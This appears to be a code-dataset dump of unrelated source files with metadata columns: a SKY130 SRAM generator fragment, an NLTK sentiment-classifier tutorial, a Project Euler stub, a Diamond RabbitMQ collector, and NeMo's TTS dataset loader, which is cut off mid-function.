# #gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name),
# spice_file="{b}/{n}/{n}.spice".format(b=base_dir,n=sram_name),
# #TODO: Will not work as-is for behav. sim (this is a structural netlist referencing std. cells)
# #Need to add std cell behavioral Verilog to sim.inputs.input_files
# verilog_sim="{b}/{n}/{n}.nl.v".format(b=base_dir,n=sram_name),
# corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"},
# supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"},
# provides=[{'lib_type': "sram", 'vt': params.vt}]))
# elif params.family == "1rw1r":
if params.family == "1rw":
self.logger.info("Compiling 1rw1r memories to OpenRAM instances")
base_dir = self.get_setting("technology.sky130.openram_lib")
fam_code = params.family
s=round(round(params.width*params.depth/8, -3)/1000) # size in kiB
w=params.width
d=params.depth
m=8
sram_name = f"sky130_sram_{s}kbyte_1rw1r_{w}x{d}_{m}"
print(f"SRAM_NAME: {sram_name}")
#TODO: Hammer SRAMParameters doesn't have this info
#TODO: replace this if OpenRAM characterization done for other corners
#For now, use typical lib for all corners
corner_str = "TT_1p8V_25C"
#corner_str = "{speed}_{volt}V_{temp}C".format(
# speed = speed,
# volt = str(corner.voltage.value_in_units("V")).replace(".","p"),
# temp = str(int(corner.temp.value_in_units("C"))).replace(".","p"))
lib_path = "{b}/{n}/{n}_{c}.lib".format(
b=base_dir,
n=sram_name,
c=corner_str)
if not os.path.exists(lib_path):
self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str))
return ExtraLibrary(prefix=None, library=Library(
name=sram_name,
nldm_liberty_file=lib_path,
lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name),
gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name),
spice_file="{b}/{n}/{n}.lvs.sp".format(b=base_dir,n=sram_name),
verilog_sim="{b}/{n}/{n}.v".format(b=base_dir,n=sram_name),
corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"},
supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"},
provides=[{'lib_type': "sram", 'vt': params.vt}]))
else:
self.logger.error("SKY130 SRAM cache does not support family:{f}".format(f=params.family))
return ExtraLibrary(prefix=None, library=None)
tool=SKY130SRAMGenerator | en | 0.421453 | # Run generator for a single sram and corner #TODO: this is really an abuse of the corner stuff # Different target memories based on port count # if params.family == "1rw": # self.logger.info("Compiling 1rw memories to DFFRAM instances") # base_dir = self.get_setting("technology.sky130.dffram_lib") # fam_code = params.family # sram_name = "RAM{d}x{w}".format( # d=params.depth, # w=params.width) # #TODO: need real libs (perhaps run Liberate here?) # #For now, use the dummy lib for all corners # corner_str = "" # # lib_path = "{b}/{n}.lib".format( # b=base_dir, # n=sram_name) # if not os.path.exists(lib_path): # self.logger.error("SKY130 1rw1r SRAM cache does not support corner: {c}".format(c=corner_str)) # return ExtraLibrary(prefix=None, library=Library( # name=sram_name, # nldm_liberty_file=lib_path, # lef_file="{b}/{n}/{n}.lef".format(b=base_dir,n=sram_name), # #TODO: GDS not generated. Unclear which DEF to use? # #gds_file="{b}/{n}/{n}.gds".format(b=base_dir,n=sram_name), # spice_file="{b}/{n}/{n}.spice".format(b=base_dir,n=sram_name), # #TODO: Will not work as-is for behav. sim (this is a structural netlist referencing std. cells) # #Need to add std cell behavioral Verilog to sim.inputs.input_files # verilog_sim="{b}/{n}/{n}.nl.v".format(b=base_dir,n=sram_name), # corner={'nmos': speed_name, 'pmos': speed_name, 'temperature': str(corner.temp.value_in_units("C")) + " C"}, # supplies={'VDD': str(corner.voltage.value_in_units("V")) + " V", 'GND': "0 V"}, # provides=[{'lib_type': "sram", 'vt': params.vt}])) # elif params.family == "1rw1r": # size in kiB #TODO: Hammer SRAMParameters doesn't have this info #TODO: replace this if OpenRAM characterization done for other corners #For now, use typical lib for all corners #corner_str = "{speed}_{volt}V_{temp}C".format( # speed = speed, # volt = str(corner.voltage.value_in_units("V")).replace(".","p"), # temp = str(int(corner.temp.value_in_units("C"))).replace(".","p")) | 2.26909 | 2 |
Section 4/nlp-4-ngrams.py | PacktPublishing/Hands-on-NLP-with-NLTK-and-scikit-learn- | 34 | 8085 | import collections
import nltk
import os
from sklearn import (
datasets, model_selection, feature_extraction, linear_model, naive_bayes,
ensemble
)
def extract_features(corpus):
'''Extract TF-IDF features from corpus'''
sa_stop_words = nltk.corpus.stopwords.words("english")
# words that might invert a sentence's meaning
white_list = [
'what', 'but', 'if', 'because', 'as', 'until', 'against',
'up', 'down', 'in', 'out', 'on', 'off', 'over', 'under', 'again',
'further', 'then', 'once', 'here', 'there', 'why', 'how', 'all', 'any',
'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only', 'own',
'same', 'so', 'than', 'too', 'can', 'will', 'just', 'don', 'should']
# take these out of the standard NLTK stop word list
sa_stop_words = [sw for sw in sa_stop_words if sw not in white_list]
# vectorize means we turn non-numerical data into an array of numbers
count_vectorizer = feature_extraction.text.CountVectorizer(
lowercase=True, # for demonstration, True by default
tokenizer=nltk.word_tokenize, # use the NLTK tokenizer
        min_df=2,  # minimum document frequency: the term must appear in at least 2 documents
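        # ngram_range=(1, 2) keeps unigrams and bigrams; bigrams help capture short negations such as "not good"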
ngram_range=(1, 2),
stop_words=sa_stop_words
)
processed_corpus = count_vectorizer.fit_transform(corpus)
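    # CountVectorizer followed by TfidfTransformer gives the same result as using TfidfVectorizer directly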
processed_corpus = feature_extraction.text.TfidfTransformer().fit_transform(
processed_corpus)
return processed_corpus
data_directory = 'movie_reviews'
movie_sentiment_data = datasets.load_files(data_directory, shuffle=True)
print('{} files loaded.'.format(len(movie_sentiment_data.data)))
print('They contain the following classes: {}.'.format(
movie_sentiment_data.target_names))
movie_tfidf = extract_features(movie_sentiment_data.data)
X_train, X_test, y_train, y_test = model_selection.train_test_split(
movie_tfidf, movie_sentiment_data.target, test_size=0.30, random_state=42)
# similar to nltk.NaiveBayesClassifier.train()
clf1 = linear_model.LogisticRegression()
clf1.fit(X_train, y_train)
print('Logistic Regression performance: {}'.format(clf1.score(X_test, y_test)))
clf2 = linear_model.SGDClassifier()
clf2.fit(X_train, y_train)
print('SGDClassifier performance: {}'.format(clf2.score(X_test, y_test)))
clf3 = naive_bayes.MultinomialNB()
clf3.fit(X_train, y_train)
print('MultinomialNB performance: {}'.format(clf3.score(X_test, y_test)))
clf4 = naive_bayes.BernoulliNB()
clf4.fit(X_train, y_train)
print('BernoulliNB performance: {}'.format(clf4.score(X_test, y_test)))
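# 'hard' voting predicts the majority class label across the four fitted classifiers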
voting_model = ensemble.VotingClassifier(
estimators=[('lr', clf1), ('sgd', clf2), ('mnb', clf3), ('bnb', clf4)],
voting='hard')
voting_model.fit(X_train, y_train)
print('Voting classifier performance: {}'.format(
voting_model.score(X_test, y_test)))
| import collections
import nltk
import os
from sklearn import (
datasets, model_selection, feature_extraction, linear_model, naive_bayes,
ensemble
)
def extract_features(corpus):
'''Extract TF-IDF features from corpus'''
sa_stop_words = nltk.corpus.stopwords.words("english")
# words that might invert a sentence's meaning
white_list = [
'what', 'but', 'if', 'because', 'as', 'until', 'against',
'up', 'down', 'in', 'out', 'on', 'off', 'over', 'under', 'again',
'further', 'then', 'once', 'here', 'there', 'why', 'how', 'all', 'any',
'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only', 'own',
'same', 'so', 'than', 'too', 'can', 'will', 'just', 'don', 'should']
# take these out of the standard NLTK stop word list
sa_stop_words = [sw for sw in sa_stop_words if sw not in white_list]
# vectorize means we turn non-numerical data into an array of numbers
count_vectorizer = feature_extraction.text.CountVectorizer(
lowercase=True, # for demonstration, True by default
tokenizer=nltk.word_tokenize, # use the NLTK tokenizer
        min_df=2,  # minimum document frequency: the term must appear in at least 2 documents
ngram_range=(1, 2),
stop_words=sa_stop_words
)
processed_corpus = count_vectorizer.fit_transform(corpus)
processed_corpus = feature_extraction.text.TfidfTransformer().fit_transform(
processed_corpus)
return processed_corpus
data_directory = 'movie_reviews'
movie_sentiment_data = datasets.load_files(data_directory, shuffle=True)
print('{} files loaded.'.format(len(movie_sentiment_data.data)))
print('They contain the following classes: {}.'.format(
movie_sentiment_data.target_names))
movie_tfidf = extract_features(movie_sentiment_data.data)
X_train, X_test, y_train, y_test = model_selection.train_test_split(
movie_tfidf, movie_sentiment_data.target, test_size=0.30, random_state=42)
# similar to nltk.NaiveBayesClassifier.train()
clf1 = linear_model.LogisticRegression()
clf1.fit(X_train, y_train)
print('Logistic Regression performance: {}'.format(clf1.score(X_test, y_test)))
clf2 = linear_model.SGDClassifier()
clf2.fit(X_train, y_train)
print('SGDClassifier performance: {}'.format(clf2.score(X_test, y_test)))
clf3 = naive_bayes.MultinomialNB()
clf3.fit(X_train, y_train)
print('MultinomialNB performance: {}'.format(clf3.score(X_test, y_test)))
clf4 = naive_bayes.BernoulliNB()
clf4.fit(X_train, y_train)
print('BernoulliNB performance: {}'.format(clf4.score(X_test, y_test)))
voting_model = ensemble.VotingClassifier(
estimators=[('lr', clf1), ('sgd', clf2), ('mnb', clf3), ('bnb', clf4)],
voting='hard')
voting_model.fit(X_train, y_train)
print('Voting classifier performance: {}'.format(
voting_model.score(X_test, y_test)))
| en | 0.838862 | Extract TF-IDF features from corpus # words that might invert a sentence's meaning # take these out of the standard NLTK stop word list # vectorize means we turn non-numerical data into an array of numbers # for demonstration, True by default # use the NLTK tokenizer # minimum document frequency, i.e. the word must appear more than once. # similar to nltk.NaiveBayesClassifier.train() | 3.327625 | 3 |
code/gcd_sequence/sol_443.py | bhavinjawade/project-euler-solutions | 2 | 8086 | <reponame>bhavinjawade/project-euler-solutions
# -*- coding: utf-8 -*-
'''
File name: code\gcd_sequence\sol_443.py
Author: <NAME>
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #443 :: GCD sequence
#
# For more information see:
# https://projecteuler.net/problem=443
# Problem Statement
'''
Let g(n) be a sequence defined as follows:
g(4) = 13,
g(n) = g(n-1) + gcd(n, g(n-1)) for n > 4.
The first few values are:
   n   :  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 20 ...
 g(n)  : 13 14 16 17 18 27 28 29 30 31 32 33 34 51 54 55 60 ...
You are given that g(1 000) = 2524 and g(1 000 000) = 2624152.
Find g(10^15).
'''
# Solution
# Solution Approach
'''
'''
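# A naive reference sketch of the recurrence (not a viable approach for the real
# target): it reproduces the given values g(1 000) = 2524 and g(1 000 000) = 2624152,
# but iterating all the way to 10^15 is hopeless, so the large gcd "jumps" in the
# sequence have to be handled analytically.
from math import gcd


def g_bruteforce(n_max):
    """Compute g(n_max) directly from g(4) = 13 and g(n) = g(n-1) + gcd(n, g(n-1))."""
    g = 13  # g(4)
    for n in range(5, n_max + 1):
        g += gcd(n, g)
    return g


if __name__ == "__main__":
    assert g_bruteforce(1000) == 2524          # matches the value quoted above
    assert g_bruteforce(1000000) == 2624152    # matches the value quoted above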
| # -*- coding: utf-8 -*-
'''
File name: code\gcd_sequence\sol_443.py
Author: <NAME>
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #443 :: GCD sequence
#
# For more information see:
# https://projecteuler.net/problem=443
# Problem Statement
'''
Let g(n) be a sequence defined as follows:
g(4) = 13,
g(n) = g(n-1) + gcd(n, g(n-1)) for n > 4.
The first few values are:
   n   :  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 20 ...
 g(n)  : 13 14 16 17 18 27 28 29 30 31 32 33 34 51 54 55 60 ...
You are given that g(1 000) = 2524 and g(1 000 000) = 2624152.
Find g(10^15).
'''
# Solution
# Solution Approach
'''
''' | en | 0.622069 | # -*- coding: utf-8 -*- File name: code\gcd_sequence\sol_443.py Author: <NAME> Date created: Oct 20, 2018 Python Version: 3.x # Solution to Project Euler Problem #443 :: GCD sequence # # For more information see: # https://projecteuler.net/problem=443 # Problem Statement Let g(n) be a sequence defined as follows: g(4) = 13, g(n) = g(n-1) + gcd(n, g(n-1)) for n > 4. The first few values are: n4567891011121314151617181920... g(n)1314161718272829303132333451545560... You are given that g(1 000) = 2524 and g(1 000 000) = 2624152. Find g(1015). # Solution # Solution Approach | 3.370621 | 3 |
src/collectors/rabbitmq/rabbitmq.py | lreed/Diamond | 0 | 8087 | <filename>src/collectors/rabbitmq/rabbitmq.py
# coding=utf-8
"""
Collects data from RabbitMQ through the admin interface
#### Notes
* if two vhosts have the queues with the same name, the metrics will collide
#### Dependencies
* pyrabbit
"""
import diamond.collector
try:
from numbers import Number
Number # workaround for pyflakes issue #13
import pyrabbit.api
except ImportError:
Number = None
class RabbitMQCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(RabbitMQCollector, self).get_default_config_help()
config_help.update({
'host': 'Hostname and port to collect from',
'user': 'Username',
'password': 'Password',
'queues': 'Queues to publish. Leave empty to publish all.',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(RabbitMQCollector, self).get_default_config()
config.update({
'path': 'rabbitmq',
'host': 'localhost:55672',
'user': 'guest',
'password': '<PASSWORD>',
})
return config
def collect(self):
if Number is None:
self.log.error('Unable to import either Number or pyrabbit.api')
return {}
queues = []
if 'queues' in self.config:
queues = self.config['queues'].split()
try:
client = pyrabbit.api.Client(self.config['host'],
self.config['user'],
self.config['password'])
for queue in client.get_queues():
# skip queues we don't want to publish
if queues and queue['name'] not in queues:
continue
for key in queue:
name = '{0}.{1}'.format('queues', queue['name'])
self._publish_metrics(name, [], key, queue)
overview = client.get_overview()
for key in overview:
self._publish_metrics('', [], key, overview)
        except Exception as e:
            self.log.error("Couldn't connect to RabbitMQ: %s", e)
return {}
def _publish_metrics(self, name, prev_keys, key, data):
"""Recursively publish keys"""
value = data[key]
keys = prev_keys + [key]
if isinstance(value, dict):
for new_key in value:
self._publish_metrics(name, keys, new_key, value)
elif isinstance(value, Number):
joined_keys = '.'.join(keys)
if name:
publish_key = '{0}.{1}'.format(name, joined_keys)
else:
publish_key = joined_keys
self.publish(publish_key, value)
| <filename>src/collectors/rabbitmq/rabbitmq.py
# coding=utf-8
"""
Collects data from RabbitMQ through the admin interface
#### Notes
* if two vhosts have the queues with the same name, the metrics will collide
#### Dependencies
* pyrabbit
"""
import diamond.collector
try:
from numbers import Number
Number # workaround for pyflakes issue #13
import pyrabbit.api
except ImportError:
Number = None
class RabbitMQCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(RabbitMQCollector, self).get_default_config_help()
config_help.update({
'host': 'Hostname and port to collect from',
'user': 'Username',
'password': 'Password',
'queues': 'Queues to publish. Leave empty to publish all.',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(RabbitMQCollector, self).get_default_config()
config.update({
'path': 'rabbitmq',
'host': 'localhost:55672',
'user': 'guest',
'password': '<PASSWORD>',
})
return config
def collect(self):
if Number is None:
self.log.error('Unable to import either Number or pyrabbit.api')
return {}
queues = []
if 'queues' in self.config:
queues = self.config['queues'].split()
try:
client = pyrabbit.api.Client(self.config['host'],
self.config['user'],
self.config['password'])
for queue in client.get_queues():
# skip queues we don't want to publish
if queues and queue['name'] not in queues:
continue
for key in queue:
name = '{0}.{1}'.format('queues', queue['name'])
self._publish_metrics(name, [], key, queue)
overview = client.get_overview()
for key in overview:
self._publish_metrics('', [], key, overview)
        except Exception as e:
            self.log.error("Couldn't connect to RabbitMQ: %s", e)
return {}
def _publish_metrics(self, name, prev_keys, key, data):
"""Recursively publish keys"""
value = data[key]
keys = prev_keys + [key]
if isinstance(value, dict):
for new_key in value:
self._publish_metrics(name, keys, new_key, value)
elif isinstance(value, Number):
joined_keys = '.'.join(keys)
if name:
publish_key = '{0}.{1}'.format(name, joined_keys)
else:
publish_key = joined_keys
self.publish(publish_key, value)
| en | 0.765086 | # coding=utf-8 Collects data from RabbitMQ through the admin interface #### Notes * if two vhosts have the queues with the same name, the metrics will collide #### Dependencies * pyrabbit # workaround for pyflakes issue #13 Returns the default collector settings # skip queues we don't want to publish Recursively publish keys | 2.188792 | 2 |
nemo/collections/tts/torch/data.py | MalikIdreesHasanKhan/NeMo | 4,145 | 8088 | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pickle
from pathlib import Path
from typing import Callable, Dict, List, Optional, Union
import librosa
import torch
from nemo_text_processing.text_normalization.normalize import Normalizer
from tqdm import tqdm
from nemo.collections.asr.parts.preprocessing.features import WaveformFeaturizer
from nemo.collections.tts.torch.helpers import (
BetaBinomialInterpolator,
beta_binomial_prior_distribution,
general_padding,
)
from nemo.collections.tts.torch.tts_data_types import (
DATA_STR2DATA_CLASS,
MAIN_DATA_TYPES,
VALID_SUPPLEMENTARY_DATA_TYPES,
DurationPrior,
Durations,
Energy,
LMTokens,
LogMel,
Pitch,
SpeakerID,
WithLens,
)
from nemo.collections.tts.torch.tts_tokenizers import BaseTokenizer, EnglishCharsTokenizer, EnglishPhonemesTokenizer
from nemo.core.classes import Dataset
from nemo.utils import logging
class TTSDataset(Dataset):
def __init__(
self,
manifest_filepath: str,
sample_rate: int,
text_tokenizer: Union[BaseTokenizer, Callable[[str], List[int]]],
tokens: Optional[List[str]] = None,
text_normalizer: Optional[Union[Normalizer, Callable[[str], str]]] = None,
text_normalizer_call_args: Optional[Dict] = None,
text_tokenizer_pad_id: Optional[int] = None,
sup_data_types: Optional[List[str]] = None,
sup_data_path: Optional[Union[Path, str]] = None,
max_duration: Optional[float] = None,
min_duration: Optional[float] = None,
ignore_file: Optional[str] = None,
trim: bool = False,
n_fft=1024,
win_length=None,
hop_length=None,
window="hann",
n_mels=80,
lowfreq=0,
highfreq=None,
**kwargs,
):
"""Dataset that loads main data types (audio and text) and specified supplementary data types (e.g. log mel, durations, pitch).
        Most supplementary data types will be computed on the fly and saved in sup_data_path if they did not exist before.
Arguments for supplementary data should be also specified in this class and they will be used from kwargs (see keyword args section).
Args:
manifest_filepath (str, Path, List[str, Path]): Path(s) to the .json manifests containing information on the
dataset. Each line in the .json file should be valid json. Note: the .json file itself is not valid
json. Each line should contain the following:
"audio_filepath": <PATH_TO_WAV>
"mel_filepath": <PATH_TO_LOG_MEL_PT> (Optional)
"duration": <Duration of audio clip in seconds> (Optional)
"text": <THE_TRANSCRIPT> (Optional)
sample_rate (int): The sample rate of the audio. Or the sample rate that we will resample all files to.
text_tokenizer (Optional[Union[BaseTokenizer, Callable[[str], List[int]]]]): BaseTokenizer or callable which represents text tokenizer.
tokens (Optional[List[str]]): Tokens from text_tokenizer. Should be specified if text_tokenizer is not BaseTokenizer.
text_normalizer (Optional[Union[Normalizer, Callable[[str], str]]]): Normalizer or callable which represents text normalizer.
text_normalizer_call_args (Optional[Dict]): Additional arguments for text_normalizer function.
text_tokenizer_pad_id (Optional[int]): Index of padding. Should be specified if text_tokenizer is not BaseTokenizer.
sup_data_types (Optional[List[str]]): List of supplementary data types.
sup_data_path (Optional[Union[Path, str]]): A folder that contains or will contain supplementary data (e.g. pitch).
max_duration (Optional[float]): Max duration of audio clips in seconds. All samples exceeding this will be
pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load
audio to compute duration. Defaults to None which does not prune.
min_duration (Optional[float]): Min duration of audio clips in seconds. All samples lower than this will be
pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load
audio to compute duration. Defaults to None which does not prune.
ignore_file (Optional[str, Path]): The location of a pickle-saved list of audio_ids (the stem of the audio
files) that will be pruned prior to training. Defaults to None which does not prune.
trim (Optional[bool]): Whether to apply librosa.effects.trim to the audio file. Defaults to False.
n_fft (Optional[int]): The number of fft samples. Defaults to 1024
win_length (Optional[int]): The length of the stft windows. Defaults to None which uses n_fft.
            hop_length (Optional[int]): The hop length between fft computations. Defaults to None which uses n_fft//4.
            window (Optional[str]): One of 'hann', 'hamming', 'blackman', 'bartlett', 'none', corresponding to the
                equivalent torch window function.
n_mels (Optional[int]): The number of mel filters. Defaults to 80.
lowfreq (Optional[int]): The lowfreq input to the mel filter calculation. Defaults to 0.
highfreq (Optional[int]): The highfreq input to the mel filter calculation. Defaults to None.
Keyword Args:
durs_file (Optional[str]): String path to pickled durations location.
            durs_type (Optional[str]): Type of durations. Currently only "aligner-based" durations are supported.
use_beta_binomial_interpolator (Optional[bool]): Whether to use beta-binomial interpolator. Defaults to False.
pitch_fmin (Optional[float]): The fmin input to librosa.pyin. Defaults to librosa.note_to_hz('C2').
pitch_fmax (Optional[float]): The fmax input to librosa.pyin. Defaults to librosa.note_to_hz('C7').
pitch_avg (Optional[float]): The mean that we use to normalize the pitch.
pitch_std (Optional[float]): The std that we use to normalize the pitch.
pitch_norm (Optional[bool]): Whether to normalize pitch (via pitch_avg and pitch_std) or not.
"""
super().__init__()
self.text_normalizer = text_normalizer
self.text_normalizer_call = (
self.text_normalizer.normalize if isinstance(self.text_normalizer, Normalizer) else self.text_normalizer
)
self.text_normalizer_call_args = text_normalizer_call_args if text_normalizer_call_args is not None else {}
self.text_tokenizer = text_tokenizer
if isinstance(self.text_tokenizer, BaseTokenizer):
self.text_tokenizer_pad_id = text_tokenizer.pad
self.tokens = text_tokenizer.tokens
else:
if text_tokenizer_pad_id is None:
raise ValueError(f"text_tokenizer_pad_id must be specified if text_tokenizer is not BaseTokenizer")
if tokens is None:
raise ValueError(f"tokens must be specified if text_tokenizer is not BaseTokenizer")
self.text_tokenizer_pad_id = text_tokenizer_pad_id
self.tokens = tokens
if isinstance(manifest_filepath, str):
manifest_filepath = [manifest_filepath]
self.manifest_filepath = manifest_filepath
if sup_data_path is not None:
Path(sup_data_path).mkdir(parents=True, exist_ok=True)
self.sup_data_path = sup_data_path
self.sup_data_types = (
[DATA_STR2DATA_CLASS[d_as_str] for d_as_str in sup_data_types] if sup_data_types is not None else []
)
self.sup_data_types_set = set(self.sup_data_types)
self.data = []
audio_files = []
total_duration = 0
for manifest_file in self.manifest_filepath:
with open(Path(manifest_file).expanduser(), 'r') as f:
logging.info(f"Loading dataset from {manifest_file}.")
for line in tqdm(f):
item = json.loads(line)
file_info = {
"audio_filepath": item["audio_filepath"],
"mel_filepath": item["mel_filepath"] if "mel_filepath" in item else None,
"duration": item["duration"] if "duration" in item else None,
"text_tokens": None,
"speaker_id": item["speaker"] if "speaker" in item else None,
}
if "text" in item:
text = item["text"]
if self.text_normalizer is not None:
text = self.text_normalizer_call(text, **self.text_normalizer_call_args)
text_tokens = self.text_tokenizer(text)
file_info["raw_text"] = item["text"]
file_info["text_tokens"] = text_tokens
audio_files.append(file_info)
if file_info["duration"] is None:
logging.info(
"Not all audio files have duration information. Duration logging will be disabled."
)
total_duration = None
if total_duration is not None:
total_duration += item["duration"]
logging.info(f"Loaded dataset with {len(audio_files)} files.")
if total_duration is not None:
logging.info(f"Dataset contains {total_duration / 3600:.2f} hours.")
if ignore_file:
logging.info(f"using {ignore_file} to prune dataset.")
with open(Path(ignore_file).expanduser(), "rb") as f:
wavs_to_ignore = set(pickle.load(f))
pruned_duration = 0 if total_duration is not None else None
pruned_items = 0
for item in audio_files:
audio_path = item['audio_filepath']
audio_id = Path(audio_path).stem
# Prune data according to min/max_duration & the ignore file
if total_duration is not None:
if (min_duration and item["duration"] < min_duration) or (
max_duration and item["duration"] > max_duration
):
pruned_duration += item["duration"]
pruned_items += 1
continue
if ignore_file and (audio_id in wavs_to_ignore):
pruned_items += 1
pruned_duration += item["duration"]
wavs_to_ignore.remove(audio_id)
continue
self.data.append(item)
logging.info(f"Pruned {pruned_items} files. Final dataset contains {len(self.data)} files")
if pruned_duration is not None:
logging.info(
f"Pruned {pruned_duration / 3600:.2f} hours. Final dataset contains "
f"{(total_duration - pruned_duration) / 3600:.2f} hours."
)
self.sample_rate = sample_rate
self.featurizer = WaveformFeaturizer(sample_rate=self.sample_rate)
self.trim = trim
self.n_fft = n_fft
self.n_mels = n_mels
self.lowfreq = lowfreq
self.highfreq = highfreq
self.window = window
self.win_length = win_length or self.n_fft
self.hop_length = hop_length
self.hop_len = self.hop_length or self.n_fft // 4
self.fb = torch.tensor(
librosa.filters.mel(
self.sample_rate, self.n_fft, n_mels=self.n_mels, fmin=self.lowfreq, fmax=self.highfreq
),
dtype=torch.float,
).unsqueeze(0)
window_fn = {
'hann': torch.hann_window,
'hamming': torch.hamming_window,
'blackman': torch.blackman_window,
'bartlett': torch.bartlett_window,
'none': None,
}.get(self.window, None)
self.stft = lambda x: torch.stft(
input=x,
n_fft=self.n_fft,
hop_length=self.hop_len,
win_length=self.win_length,
window=window_fn(self.win_length, periodic=False).to(torch.float) if window_fn else None,
)
for data_type in self.sup_data_types:
if data_type not in VALID_SUPPLEMENTARY_DATA_TYPES:
raise NotImplementedError(f"Current implementation of TTSDataset doesn't support {data_type} type.")
getattr(self, f"add_{data_type.name}")(**kwargs)
def add_log_mel(self, **kwargs):
pass
def add_durations(self, **kwargs):
durs_file = kwargs.pop('durs_file')
durs_type = kwargs.pop('durs_type')
audio_stem2durs = torch.load(durs_file)
self.durs = []
for tag in [Path(d["audio_filepath"]).stem for d in self.data]:
durs = audio_stem2durs[tag]
if durs_type == "aligner-based":
self.durs.append(durs)
else:
raise NotImplementedError(
f"{durs_type} duration type is not supported. Only align-based is supported at this moment."
)
def add_duration_prior(self, **kwargs):
self.use_beta_binomial_interpolator = kwargs.pop('use_beta_binomial_interpolator', False)
if self.use_beta_binomial_interpolator:
self.beta_binomial_interpolator = BetaBinomialInterpolator()
def add_pitch(self, **kwargs):
self.pitch_fmin = kwargs.pop("pitch_fmin", librosa.note_to_hz('C2'))
self.pitch_fmax = kwargs.pop("pitch_fmax", librosa.note_to_hz('C7'))
self.pitch_avg = kwargs.pop("pitch_avg", None)
self.pitch_std = kwargs.pop("pitch_std", None)
self.pitch_norm = kwargs.pop("pitch_norm", False)
def add_energy(self, **kwargs):
pass
def add_speaker_id(self, **kwargs):
pass
def get_spec(self, audio):
with torch.cuda.amp.autocast(enabled=False):
spec = self.stft(audio)
if spec.dtype in [torch.cfloat, torch.cdouble]:
spec = torch.view_as_real(spec)
spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-9)
return spec
def get_log_mel(self, audio):
with torch.cuda.amp.autocast(enabled=False):
spec = self.get_spec(audio)
mel = torch.matmul(self.fb.to(spec.dtype), spec)
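            # clamp to the smallest positive float before the log so silent frames yield a finite floor instead of -inf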
log_mel = torch.log(torch.clamp(mel, min=torch.finfo(mel.dtype).tiny))
return log_mel
def __getitem__(self, index):
sample = self.data[index]
audio_stem = Path(sample["audio_filepath"]).stem
features = self.featurizer.process(sample["audio_filepath"], trim=self.trim)
audio, audio_length = features, torch.tensor(features.shape[0]).long()
text = torch.tensor(sample["text_tokens"]).long()
text_length = torch.tensor(len(sample["text_tokens"])).long()
log_mel, log_mel_length = None, None
if LogMel in self.sup_data_types_set:
mel_path = sample["mel_filepath"]
if mel_path is not None and Path(mel_path).exists():
log_mel = torch.load(mel_path)
else:
mel_path = Path(self.sup_data_path) / f"mel_{audio_stem}.pt"
if mel_path.exists():
log_mel = torch.load(mel_path)
else:
log_mel = self.get_log_mel(audio)
torch.save(log_mel, mel_path)
log_mel = log_mel.squeeze(0)
log_mel_length = torch.tensor(log_mel.shape[1]).long()
durations = None
if Durations in self.sup_data_types_set:
durations = self.durs[index]
duration_prior = None
if DurationPrior in self.sup_data_types_set:
if self.use_beta_binomial_interpolator:
mel_len = self.get_log_mel(audio).shape[2]
duration_prior = torch.from_numpy(self.beta_binomial_interpolator(mel_len, text_length.item()))
else:
prior_path = Path(self.sup_data_path) / f"pr_{audio_stem}.pt"
if prior_path.exists():
duration_prior = torch.load(prior_path)
else:
mel_len = self.get_log_mel(audio).shape[2]
duration_prior = beta_binomial_prior_distribution(text_length, mel_len)
duration_prior = torch.from_numpy(duration_prior)
torch.save(duration_prior, prior_path)
pitch, pitch_length = None, None
if Pitch in self.sup_data_types_set:
pitch_name = (
f"{audio_stem}_pitch_pyin_"
f"fmin{self.pitch_fmin}_fmax{self.pitch_fmax}_"
f"fl{self.win_length}_hs{self.hop_len}.pt"
)
pitch_path = Path(self.sup_data_path) / pitch_name
if pitch_path.exists():
pitch = torch.load(pitch_path).float()
else:
pitch, _, _ = librosa.pyin(
audio.numpy(),
fmin=self.pitch_fmin,
fmax=self.pitch_fmax,
frame_length=self.win_length,
sr=self.sample_rate,
fill_na=0.0,
)
pitch = torch.from_numpy(pitch).float()
torch.save(pitch, pitch_path)
if self.pitch_avg is not None and self.pitch_std is not None and self.pitch_norm:
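                # mean/variance normalization; unvoiced frames (originally 0) are re-zeroed after the mean shift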
pitch -= self.pitch_avg
                pitch[pitch == -self.pitch_avg] = 0.0  # Zero out values that were previously zero
pitch /= self.pitch_std
pitch_length = torch.tensor(len(pitch)).long()
energy, energy_length = None, None
if Energy in self.sup_data_types_set:
energy_path = Path(self.sup_data_path) / f"{audio_stem}_energy_wl{self.win_length}_hs{self.hop_len}.pt"
if energy_path.exists():
energy = torch.load(energy_path).float()
else:
spec = self.get_spec(audio)
energy = torch.linalg.norm(spec.squeeze(0), axis=0).float()
torch.save(energy, energy_path)
energy_length = torch.tensor(len(energy)).long()
speaker_id = None
if SpeakerID in self.sup_data_types_set:
speaker_id = torch.tensor(sample["speaker_id"]).long()
return (
audio,
audio_length,
text,
text_length,
log_mel,
